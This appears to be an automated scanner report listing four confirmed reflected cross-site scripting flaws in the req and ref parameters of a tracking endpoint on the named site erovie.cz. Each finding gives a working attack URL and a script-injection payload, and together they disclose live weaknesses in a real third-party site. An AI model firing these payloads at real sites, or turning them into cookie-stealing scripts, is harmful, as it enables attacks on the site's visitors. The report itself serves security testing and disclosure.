erovie.cz

1.  
2. XSS (Cross-site Scripting)
3.  
4. Severity: Important
5. Confirmation: Confirmed
6. URL: http://www.erovie.cz/tracking?vs=1365772963078&req='"--></style></script><script>alert(0x000497)</script>&ref=3&is404=1&cclg=cs
7. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
8. Parameter Name: req
9. Parameter Type: Querystring
10. Attack Pattern: '"--></style></script><script>alert(0x000497)</script>
11.  
12. Severity: Important
13. Confirmation: Confirmed
14. URL: http://www.erovie.cz/tracking?vs=1365772963078&req=about:blank&ref='"--></style></script><script>alert(0x00049A)</script>&is404=1&cclg=cs
15. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
16. Parameter Name: ref
17. Parameter Type: Querystring
18. Attack Pattern: '"--></style></script><script>alert(0x00049A)</script>
19.  
20. Severity: Important
21. Confirmation: Confirmed
22. URL: http://www.erovie.cz/tracking?vs=1365772964681&req='"--></style></script><script>alert(0x0004D8)</script>&ref=3&is404=1&breg=1&cclg=cs
23. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
24. Parameter Name: req
25. Parameter Type: Querystring
26. Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
27.  
28. Severity: Important
29. Confirmation: Confirmed
30. URL: http://www.erovie.cz/tracking?vs=1365772964681&req=about:blank&ref='"--></style></script><script>alert(0x0004D9)</script>&is404=1&breg=1&cclg=cs
31. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
32. Parameter Name: ref
33. Parameter Type: Querystring
34. Attack Pattern: '"--></style></script><script>alert(0x0004D9)</script>